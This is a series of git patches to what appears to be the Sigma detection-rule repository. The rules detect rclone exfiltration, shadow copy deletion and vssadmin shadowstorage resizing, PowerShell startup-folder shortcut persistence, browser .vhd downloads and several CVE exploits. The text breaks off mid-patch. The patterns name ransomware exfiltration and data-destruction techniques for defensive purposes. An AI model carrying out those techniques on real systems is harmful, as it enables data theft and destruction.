Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 18:47:04 +0200 Subject: [PATCH 1314/1367] Update win_susp_rclone_execution.yml --- .../win_susp_rclone_execution.yml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index 4b20bb67..5f185a57 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -1,5 +1,10 @@ title: Rclone Execution via Command Line or PowerShell -id: e37db05d-d1f9-49c8-b464-cee1a4b11638 +id: e37db05d-d1f9-49c8-b464-cee1a4b11638 +related: + - id: a0d63692-a531-4912-ad39-4393325b2a9c + type: obsoletes + - id: cb7286ba-f207-44ab-b9e6-760d82b84253 + type: obsoletes description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc status: experimental date: 2021/05/10 @@ -39,7 +44,7 @@ detection: - 'multi-thread-streams' - 'no-check-certificate ' description_selection: - Description: 'Rsync for cloud storage' + Description: 'Rsync for cloud storage' condition: command_selection and ( description_selection or exec_selection ) fields: - CommandLine @@ -51,9 +56,3 @@ tags: falsepositives: - Legitimate RClone use level: high -id: e37db05d-d1f9-49c8-b464-cee1a4b11638 -related: - - id: a0d63692-a531-4912-ad39-4393325b2a9c - type: obsoletes - - id: cb7286ba-f207-44ab-b9e6-760d82b84253 - type: obsoletes From 75f4f439daba43d2e97a380e89441932228f1445 Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Sun, 24 Oct 2021 13:32:22 -0400 Subject: [PATCH 1315/1367] Create sysmon_powershell_startup_shortcuts --- .../sysmon_powershell_startup_shortcuts | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/file_event/sysmon_powershell_startup_shortcuts diff --git a/rules/windows/file_event/sysmon_powershell_startup_shortcuts b/rules/windows/file_event/sysmon_powershell_startup_shortcuts new file mode 100644 index 00000000..2f0b954b --- /dev/null +++ b/rules/windows/file_event/sysmon_powershell_startup_shortcuts @@ -0,0 +1,33 @@ +title: PowerShell writing startup shortcuts +id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d +description: Attempts to detect PowerShell writing startup shortcuts. +status: experimental +references: + - https://redcanary.com/blog/intelligence-insights-october-2021/ + # We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. + # Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. + # In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" +notes: + - Atomic Test is avaiable. Copy and Paste the command into an elevated PowerShell to generate logs, then run the cleanup step. + https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder + + - Current SIGMA rule "Startup folder File Write" does not cover this activity, as it looks in the \ProgramData\ file path and not \AppData\. + https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/sysmon_startup_folder_file_write.yml +tags: + - attack.registry_run_keys_/_startup_folder + - attack.t1547.001 +date: 2021/10/24 +author: Christopher Peacock (@securepeacock), SCYTHE +level: high +logsource: + product: windows + category: file_event +detection: + selection: + Image|endswith: '\powershell.exe' + TargetFilename|contains: '\start menu\programs\startup\' + TargetFilename|endswith: '.lnk' + condition: selection +falsepositives: + - Unknown + - Depending on your environment accepted applications may leverage this at times. It is recomended to search for anomolies inidicative of malware. From 03301a065204f29f81b69f1c576d750475aaabfb Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Sun, 24 Oct 2021 13:56:01 -0400 Subject: [PATCH 1316/1367] Rename sysmon_powershell_startup_shortcuts to sysmon_powershell_startup_shortcuts.yml --- ..._startup_shortcuts => sysmon_powershell_startup_shortcuts.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/file_event/{sysmon_powershell_startup_shortcuts => sysmon_powershell_startup_shortcuts.yml} (100%) diff --git a/rules/windows/file_event/sysmon_powershell_startup_shortcuts b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml similarity index 100% rename from rules/windows/file_event/sysmon_powershell_startup_shortcuts rename to rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml From 90654858559ddac863ef4acb1d97c6bb80d07237 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 20:12:55 +0200 Subject: [PATCH 1317/1367] update detection --- .../process_creation/win_shadow_copies_deletion.yml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_shadow_copies_deletion.yml b/rules/windows/process_creation/win_shadow_copies_deletion.yml index 45e71b95..2828e962 100644 --- a/rules/windows/process_creation/win_shadow_copies_deletion.yml +++ b/rules/windows/process_creation/win_shadow_copies_deletion.yml @@ -4,7 +4,7 @@ status: stable description: Shadow Copies deletion using operating systems utilities author: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) date: 2019/10/22 -modified: 2021/06/02 +modified: 2021/10/24 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://blog.talosintelligence.com/2017/05/wannacry.html @@ -13,6 +13,7 @@ references: - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 - https://github.com/Neo23x0/Raccine#the-process - https://github.com/Neo23x0/Raccine/blob/main/yara/gen_ransomware_command_lines.yar + - https://redcanary.com/blog/intelligence-insights-october-2021/ tags: - attack.defense_evasion - attack.impact @@ -38,6 +39,12 @@ detection: - delete - catalog - quiet # will match -quiet or /quiet + selection2: + Image|endswith: '\vssadmin.exe' + CommandLine|contains|all: + - resize + - shadowstorage + - unbounded condition: 1 of selection* fields: - CommandLine From 9ff310541aef0f2357ce9560d314095e6d8dc966 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 20:14:44 +0200 Subject: [PATCH 1318/1367] add selection3 --- rules/windows/process_creation/win_shadow_copies_deletion.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_shadow_copies_deletion.yml b/rules/windows/process_creation/win_shadow_copies_deletion.yml index 2828e962..8eaf9b84 100644 --- a/rules/windows/process_creation/win_shadow_copies_deletion.yml +++ b/rules/windows/process_creation/win_shadow_copies_deletion.yml @@ -39,7 +39,7 @@ detection: - delete - catalog - quiet # will match -quiet or /quiet - selection2: + selection3: Image|endswith: '\vssadmin.exe' CommandLine|contains|all: - resize From 265faf6337dbcd8ce7ffc10131c6d3d784fa8c1f Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Sun, 24 Oct 2021 14:15:04 -0400 Subject: [PATCH 1319/1367] Update sysmon_powershell_startup_shortcuts.yml --- .../file_event/sysmon_powershell_startup_shortcuts.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml index 2f0b954b..70c82df3 100644 --- a/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml +++ b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml @@ -1,4 +1,4 @@ -title: PowerShell writing startup shortcuts +title: PowerShell Writing Startup Shortcuts id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d description: Attempts to detect PowerShell writing startup shortcuts. status: experimental @@ -17,7 +17,7 @@ tags: - attack.registry_run_keys_/_startup_folder - attack.t1547.001 date: 2021/10/24 -author: Christopher Peacock (@securepeacock), SCYTHE +author: Christopher Peacock '@securepeacock', SCYTHE level: high logsource: product: windows From 8b45c6687c1aeaad234b82dd7f4df9fb88037aee Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Sun, 24 Oct 2021 16:07:40 -0400 Subject: [PATCH 1320/1367] Update sysmon_powershell_startup_shortcuts.yml --- .../sysmon_powershell_startup_shortcuts.yml | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml index 70c82df3..a7ed3cfa 100644 --- a/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml +++ b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml @@ -1,18 +1,10 @@ title: PowerShell Writing Startup Shortcuts id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d -description: Attempts to detect PowerShell writing startup shortcuts. +description: Attempts to detect PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" status: experimental references: - https://redcanary.com/blog/intelligence-insights-october-2021/ - # We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. - # Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. - # In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" -notes: - - Atomic Test is avaiable. Copy and Paste the command into an elevated PowerShell to generate logs, then run the cleanup step. - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder - - - Current SIGMA rule "Startup folder File Write" does not cover this activity, as it looks in the \ProgramData\ file path and not \AppData\. - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/sysmon_startup_folder_file_write.yml + - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder tags: - attack.registry_run_keys_/_startup_folder - attack.t1547.001 From e4d2b6e5d94a81ea9c77cc1dc516b2f68c230435 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 25 Oct 2021 09:07:22 +0200 Subject: [PATCH 1321/1367] add file_event_mal_vhd_download --- .../file_event_mal_vhd_download.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/file_event/file_event_mal_vhd_download.yml diff --git a/rules/windows/file_event/file_event_mal_vhd_download.yml b/rules/windows/file_event/file_event_mal_vhd_download.yml new file mode 100644 index 00000000..9634cfff --- /dev/null +++ b/rules/windows/file_event/file_event_mal_vhd_download.yml @@ -0,0 +1,28 @@ +title: Suspicious VHD Image Download From Browser +id: 8468111a-ef07-4654-903b-b863a80bbc95 +status: experimental +description: Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls +references: + - https://redcanary.com/blog/intelligence-insights-october-2021/ + - https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/ + - https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ +author: frack113 +date: 2021/10/25 +tags: + - attack.resource_development + - attack.t1587.001 +logsource: + category: file_event + product: windows + definition: in sysmon add ".vhd " +detection: + selection: + - Image|endswith: + - chrome.exe + - firefox.exe + - microsoftedge.exe + - microsoftedgecp.exe + - msedge.exe + - TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier + condition: selection +level: high \ No newline at end of file From 12707f8ec5ee41e81aa5828ece3f8b91858462ad Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 25 Oct 2021 09:16:59 +0200 Subject: [PATCH 1322/1367] fix level --- rules/windows/file_event/file_event_mal_vhd_download.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_mal_vhd_download.yml b/rules/windows/file_event/file_event_mal_vhd_download.yml index 9634cfff..2ddeca79 100644 --- a/rules/windows/file_event/file_event_mal_vhd_download.yml +++ b/rules/windows/file_event/file_event_mal_vhd_download.yml @@ -25,4 +25,6 @@ detection: - msedge.exe - TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier condition: selection -level: high \ No newline at end of file +falsepositives: + - Legitimate user creation +level: medium From 5294e91828f77ab40a3441ec71cba06506633e39 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 17:29:01 +0200 Subject: [PATCH 1323/1367] Update file_event_mal_vhd_download.yml --- rules/windows/file_event/file_event_mal_vhd_download.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_mal_vhd_download.yml b/rules/windows/file_event/file_event_mal_vhd_download.yml index 2ddeca79..ec4aa319 100644 --- a/rules/windows/file_event/file_event_mal_vhd_download.yml +++ b/rules/windows/file_event/file_event_mal_vhd_download.yml @@ -6,7 +6,7 @@ references: - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/ - https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ -author: frack113 +author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' date: 2021/10/25 tags: - attack.resource_development @@ -23,6 +23,9 @@ detection: - microsoftedge.exe - microsoftedgecp.exe - msedge.exe + - iexplorer.exe + - brave.exe + - opera.exe - TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier condition: selection falsepositives: From 162d869e2bd513f371606e9ee39445db135d2f69 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 18:14:03 +0200 Subject: [PATCH 1324/1367] Add cve tags --- .../sysmon_cve_2021_26858_msexchange.yml | 3 +-- .../win_exploit_cve_2020_10189.yml | 3 +-- ..._susp_servu_exploitation_cve_2021_35211.yml | 2 +- .../win_susp_servu_process_pattern.yml | 2 +- ..._cve_2021_31979_cve_2021_33771_exploits.yml | 4 ++-- .../sysmon_registry_susp_printer_driver.yml | 2 +- .../win_registry_mimikatz_printernightmare.yml | 4 ++-- tests/test_rules.py | 18 ++++-------------- 8 files changed, 13 insertions(+), 25 deletions(-) diff --git a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml index 84390c48..acce751b 100644 --- a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml +++ b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml @@ -7,13 +7,12 @@ author: Bhabesh Raj status: experimental level: critical references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ - - https://nvd.nist.gov/vuln/detail/cve-2021-26858 date: 2021/03/03 tags: - attack.t1203 - attack.execution + - cve.2021.26858 logsource: category: file_event product: windows diff --git a/rules/windows/process_creation/win_exploit_cve_2020_10189.yml b/rules/windows/process_creation/win_exploit_cve_2020_10189.yml index 10aaacd2..0b591d74 100644 --- a/rules/windows/process_creation/win_exploit_cve_2020_10189.yml +++ b/rules/windows/process_creation/win_exploit_cve_2020_10189.yml @@ -4,8 +4,6 @@ status: experimental description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189 - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224 author: Florian Roth date: 2020/03/25 @@ -18,6 +16,7 @@ tags: - attack.t1059.003 - attack.t1059 # an old one - attack.s0190 + - cve.2020.10189 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml index 4056fcdb..25032789 100644 --- a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml +++ b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml @@ -6,13 +6,13 @@ author: Florian Roth date: 2021/07/14 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ - - https://nvd.nist.gov/vuln/detail/cve-2021-35211 logsource: category: process_creation product: windows tags: - attack.persistence - attack.t1136.001 + - cve.2021.35211 # - threat_group.DEV-0322 detection: selection1: diff --git a/rules/windows/process_creation/win_susp_servu_process_pattern.yml b/rules/windows/process_creation/win_susp_servu_process_pattern.yml index 90b50893..c1a92be5 100644 --- a/rules/windows/process_creation/win_susp_servu_process_pattern.yml +++ b/rules/windows/process_creation/win_susp_servu_process_pattern.yml @@ -6,12 +6,12 @@ author: Florian Roth date: 2021/07/14 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ - - https://nvd.nist.gov/vuln/detail/cve-2021-35211 logsource: category: process_creation product: windows tags: - attack.credential_access + - cve.2021.35211 detection: selection: ParentImage|endswith: '\Serv-U.exe' diff --git a/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml index 1126237c..5a9aa6a1 100644 --- a/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml @@ -8,12 +8,12 @@ modified: 2021/09/09 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ - - https://nvd.nist.gov/vuln/detail/cve-2021-33771 - - https://nvd.nist.gov/vuln/detail/cve-2021-31979 tags: - attack.credential_access - attack.t1566 - attack.t1203 + - cve.2021.33771 + - cve.2021.31979 # - threat_group.Sourgum logsource: product: windows diff --git a/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml b/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml index ad3f790d..c7373356 100644 --- a/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml +++ b/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml @@ -4,11 +4,11 @@ status: experimental description: Detects a suspicious printer driver installation with an empty Manufacturer value references: - https://twitter.com/SBousseaden/status/1410545674773467140 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 author: Florian Roth date: 2020/07/01 tags: - attack.privilege_escalation + - cve.2021.1675 logsource: category: registry_event product: windows diff --git a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml index db8f4a1f..22fa2806 100644 --- a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml +++ b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml @@ -6,11 +6,11 @@ references: - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760 - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-34527 author: Markus Neis, @markus_neis, Florian Roth tags: - attack.execution + - cve.2021.1675 + - cve.2021.34527 date: 2021/07/04 modified: 2021/07/28 logsource: diff --git a/tests/test_rules.py b/tests/test_rules.py index 6d10f80e..b31c8eab 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -75,20 +75,13 @@ class TestRules(unittest.TestCase): def test_optional_tags(self): files_with_incorrect_tags = [] - + tags_pattern = re.compile(r"cve\.\d+\.\d+|attack\.t\d+\.*\d*|attack\.[a-z_]+|car\.\d{4}-\d{2}-\d{3}") for file in self.yield_next_rule_file_path(self.path_to_rules): tags = self.get_rule_part(file_path=file, part_name="tags") if tags: for tag in tags: - if tag.startswith("attack."): - continue - elif tag.startswith("car."): - continue - elif tag.startswith("cve."): - print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag)) - files_with_incorrect_tags.append(file) - else: - print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag)) + if tags_pattern.match(tag) == None: + print(Fore.RED + "Rule {} has the invalid tag <{}>".format(file, tag)) files_with_incorrect_tags.append(file) self.assertEqual(files_with_incorrect_tags, [], Fore.RED + @@ -450,7 +443,7 @@ class TestRules(unittest.TestCase): "There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)") # Upgrade Detection Rule License 1.1 - def test_author(self): + def test_optional_author(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): author_str = self.get_rule_part(file_path=file, part_name="author") @@ -459,9 +452,6 @@ class TestRules(unittest.TestCase): if not isinstance(author_str, str): print(Fore.YELLOW + "Rule {} has a 'author' field that isn't a string.".format(file)) faulty_rules.append(file) - else: - print(Fore.YELLOW + "Rule {} has no 'author' field".format(file)) - faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'author' fields. (has to be a string even if it contains many author)") From f8574fcd819baa6899ec5a1a63546f6743491da6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 18:40:50 +0200 Subject: [PATCH 1325/1367] Add cve tags --- .../lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml | 3 +-- ..._auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml | 3 +-- rules/linux/lnx_sudo_cve_2019_14287.yml | 1 + rules/linux/lnx_sudo_cve_2019_14287_user.yml | 1 + .../zeek_dce_rpc_printnightmare_print_driver_install.yml | 6 ++++-- ...eb_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml | 4 ++-- rules/web/web_cve_2018_2894_weblogic_exploit.yml | 3 +-- rules/web/web_cve_2020_14882_weblogic_exploit.yml | 3 +-- rules/web/web_cve_2020_3452_cisco_asa_ftd.yml | 3 +-- rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml | 2 +- .../web/web_cve_2021_21978_vmware_view_planner_exploit.yml | 3 +-- rules/web/web_cve_2021_26814_wzuh_rce.yml | 4 ++-- rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml | 3 +-- .../builtin/win_exploit_cve_2021_1675_printspooler.yml | 2 +- .../win_exploit_cve_2021_1675_printspooler_operational.yml | 2 +- .../win_exploit_cve_2021_1675_printspooler_security.yml | 4 ++-- rules/windows/driver_load/driver_load_vuln_dell_driver.yml | 2 +- .../file_delete/win_cve_2021_1675_printspooler_del.yml | 2 +- .../file_event_cve_2021_31979_cve_2021_33771_exploits.yml | 4 ++-- rules/windows/file_event/win_cve_2021_1675_printspooler.yml | 2 +- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 +- rules/windows/image_load/sysmon_spoolsv_dll_load.yml | 4 ++-- .../process_creation/sysmon_cve_2021_26857_msexchange.yml | 3 +-- .../windows/process_creation/win_exploit_cve_2019_1378.yml | 1 + 24 files changed, 32 insertions(+), 35 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index 6c49477f..e4d19520 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml @@ -8,12 +8,11 @@ author: Bhabesh Raj date: 2021/02/01 modified: 2021/09/14 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - - https://nvd.nist.gov/vuln/detail/cve-2021-3156 tags: - attack.privilege_escalation - attack.t1068 + - cve.2021.3156 logsource: product: linux service: auditd diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml index 7780da68..95926299 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml @@ -11,12 +11,11 @@ author: Bhabesh Raj date: 2021/02/01 modified: 2021/09/14 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - - https://nvd.nist.gov/vuln/detail/cve-2021-3156 tags: - attack.privilege_escalation - attack.t1068 + - cve.2021.3156 logsource: product: linux service: auditd diff --git a/rules/linux/lnx_sudo_cve_2019_14287.yml b/rules/linux/lnx_sudo_cve_2019_14287.yml index 22c1cfb6..dfaa5a4e 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287.yml +++ b/rules/linux/lnx_sudo_cve_2019_14287.yml @@ -16,6 +16,7 @@ tags: - attack.t1068 - attack.t1169 # an old one - attack.t1548.003 + - cve.2019.14287 detection: selection_keywords: - '* -u#*' diff --git a/rules/linux/lnx_sudo_cve_2019_14287_user.yml b/rules/linux/lnx_sudo_cve_2019_14287_user.yml index ab92d197..d49f5e9c 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287_user.yml +++ b/rules/linux/lnx_sudo_cve_2019_14287_user.yml @@ -19,6 +19,7 @@ tags: - attack.t1068 - attack.t1169 # an old one - attack.t1548.003 + - cve.2019.14287 detection: selection_user: USER: diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml index adf32660..6ebaab90 100644 --- a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -13,10 +13,12 @@ references: - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml - https://old.zeek.org/zeekweek2019/slides/bzar.pdf - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-1678 + tags: - attack.execution + - cve-2021-1678 + - cve-2021-1675 + - cve.2021.34527 logsource: product: zeek service: dce_rpc diff --git a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml index 06718546..869a932e 100644 --- a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml +++ b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml @@ -3,8 +3,6 @@ id: f0500377-bc70-425d-ac8c-e956cd906871 status: experimental description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. references: - - https://nvd.nist.gov/vuln/detail/cve-2021-20090 - - https://nvd.nist.gov/vuln/detail/cve-2021-20091 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://www.tenable.com/security/research/tra-2021-13 - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild @@ -17,6 +15,8 @@ level: critical tags: - attack.initial_access - attack.t1190 + - cve.2021.20090 + - cve.2021.20091 logsource: category: webserver detection: diff --git a/rules/web/web_cve_2018_2894_weblogic_exploit.yml b/rules/web/web_cve_2018_2894_weblogic_exploit.yml index b2fcd3e7..0ca683c2 100644 --- a/rules/web/web_cve_2018_2894_weblogic_exploit.yml +++ b/rules/web/web_cve_2018_2894_weblogic_exploit.yml @@ -6,10 +6,8 @@ author: Florian Roth date: 2018/07/22 modified: 2021/08/09 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894 - https://twitter.com/pyn3rd/status/1020620932967223296 - https://github.com/LandGrey/CVE-2018-2894 - - https://nvd.nist.gov/vuln/detail/cve-2018-2894 logsource: category: webserver detection: @@ -28,3 +26,4 @@ tags: - attack.initial_access - attack.persistence - attack.t1505.003 + - cve.2018.2894 diff --git a/rules/web/web_cve_2020_14882_weblogic_exploit.yml b/rules/web/web_cve_2020_14882_weblogic_exploit.yml index cb3545ad..92608b05 100644 --- a/rules/web/web_cve_2020_14882_weblogic_exploit.yml +++ b/rules/web/web_cve_2020_14882_weblogic_exploit.yml @@ -6,11 +6,9 @@ author: Florian Roth date: 2020/11/02 modified: 2020/11/04 references: - - 